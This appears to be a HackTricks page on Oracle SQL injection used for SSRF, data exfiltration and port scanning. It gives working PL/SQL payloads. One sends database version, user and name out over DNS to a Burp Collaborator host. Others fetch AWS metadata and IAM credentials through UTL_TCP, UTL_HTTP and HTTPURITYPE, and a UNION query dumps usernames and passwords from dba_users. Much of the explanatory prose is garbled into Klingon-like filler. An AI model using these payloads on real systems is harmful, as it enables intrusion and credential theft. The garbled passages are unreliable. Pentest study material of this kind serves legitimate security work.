# Oracle injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
**Serve this post a wayback machine copy of the deleted post from [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
## SSRF
Oracle vItlh Out of Band HTTP je DNS request vItlhutlh injections vItlh. jatlhpu' vItlhutlh techniques/functions modify vItlhutlh SSRF/XSPA.
Oracle cha'logh qatlh, 'ach vaj 'oH 'ej vItlhutlh commands try instance setup vItlhutlh. [Appsecco](https://appsecco.com) vItlhpu'wI' 'ej [Abhisek Datta](https://github.com/abhisek), [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c) vItlhutlh vItlhutlh instance setup vItlhutlh t2.large AWS Ubuntu machine 'ej Docker.
Docker command 'e' vItlhutlh `--network="host"` flag Oracle native install mimic network access vItlhutlh, blogpost vItlhutlh.
```
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
```
#### Oracle packages that support a URL or a Hostname/Port Number specification
**Oracle packages vItlhutlh** 'ej **vItlhutlh** 'e' vItlhutlh **URL** 'ej **Hostname/Port Number** specification **support** **ghaH**. **Oracle Database Online Documentation** [Google search](https://docs.oracle.com/database/121/index.html) **run** **order** **find** **jatlh**.
**vItlhutlh** 'ej **vItlhutlh** 'e' vItlhutlh **URL** 'ej **Hostname/Port Number** specification **support** **ghaH**.
```
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
```
The search returned the following results (not all can be used to perform outbound network)
* DBMS\_NETWORK\_ACL\_ADMIN
* UTL\_SMTP
* DBMS\_XDB
* DBMS\_SCHEDULER
* DBMS\_XDB\_CONFIG
* DBMS\_AQ
* UTL\_MAIL
* DBMS\_AQELM
* DBMS\_NETWORK\_ACL\_UTILITY
* DBMS\_MGD\_ID\_UTL
* UTL\_TCP
* DBMS\_MGWADM
* DBMS\_STREAMS\_ADM
* UTL\_HTTP
This crude search obviously skips packages like `DBMS_LDAP` (which allows passing a hostname and port number) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
In any case, letβs take a look at some of the packages that we have discovered and listed above.
**DBMS\_LDAP.INIT**
The `DBMS_LDAP` package allows for access of data from LDAP servers. The `init()` function initializes a session with an LDAP server and takes a hostname and port number as an argument.
This function has been documented before to show exfiltration of data over DNS, like below
```
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
```
DaH jImej hostname je port number jatlhpu' 'ej, vaj jImej vItlhutlh scanner port vay' vItlhutlh.
vaj 'ej vItlhutlh examples:
```
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
```
`ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` jatlh port vItlhutlh. vItlhutlh port vItlhutlhlaHbe'chugh session value.
**UTL\_SMTP**
`UTL_SMTP` package SMTP protocol yIlo'laHbe'chugh 'e-maIl je. [Oracle documentation site example](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478) yIlo'laHbe'chugh 'e-maIl yIqaw. jatlh, 'ach, vItlhutlhlaHbe'chugh host je port specification.
crude example vItlhutlhlaHbe'chugh `UTL_SMTP.OPEN_CONNECTION` function, 2 seconds timeout vItlhutlhlaHbe'chugh.
```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
```
```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
```
A `ORA-29276: transfer timeout` shows port is open but no SMTP connection was estabilished while a `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.
**UTL\_TCP**
The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.
```
set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
```
```
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
```
**UTL\_HTTP and Web Requests**
**UTL\_HTTP** **ghItlh** **web** **requests**
**ghItlh** **UTL\_HTTP** **package** **jatlh** **common** **'ej** **widely** **documented** **technique** **Out** **Band Oracle SQL Injection tutorial** **tutorial** **'e'** **[`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070)** **jatlh**. **package** **'e'** **defined** **documentation** **-** **`The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`**
```
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
```
**Oracle Injection**
Oracle Injection is a technique used to exploit vulnerabilities in Oracle databases by injecting malicious SQL queries. This can lead to unauthorized access, data manipulation, and even complete control over the database.
## Basic Oracle Injection
In Oracle databases, the `UNION` operator can be used to combine the results of two or more SELECT statements into a single result set. This can be leveraged to extract sensitive information from the database.
### Extracting Data
To extract data from an Oracle database, you can use the following query:
```sql
SELECT column_name FROM table_name UNION SELECT NULL FROM dual;
```
Replace `column_name` with the name of the column you want to extract data from, and `table_name` with the name of the table.
### Enumerating Tables
To enumerate the tables in an Oracle database, you can use the following query:
```sql
SELECT table_name FROM all_tables UNION SELECT NULL FROM dual;
```
### Enumerating Columns
To enumerate the columns in a specific table, you can use the following query:
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'table_name' UNION SELECT NULL FROM dual;
```
Replace `table_name` with the name of the table you want to enumerate columns from.
### Extracting Usernames and Passwords
To extract usernames and passwords from an Oracle database, you can use the following query:
```sql
SELECT username || ':' || password FROM dba_users UNION SELECT NULL FROM dual;
```
### Performing Port Scanning
You can also use Oracle Injection to perform rudimentary port scanning by leveraging the `UTL_TCP` package in Oracle. This package allows you to create TCP connections and send/receive data.
To perform port scanning, you can use the following query:
```sql
DECLARE
c utl_tcp.connection;
BEGIN
c := utl_tcp.open_connection('target_ip', target_port);
utl_tcp.close_connection(c);
EXCEPTION
WHEN OTHERS THEN
NULL;
END;
```
Replace `target_ip` with the IP address of the target and `target_port` with the port number you want to scan.
Keep in mind that port scanning is a potentially intrusive activity and may be illegal or against the terms of service of the target system. Always ensure you have proper authorization before performing any port scanning activities.
```
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
```
A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.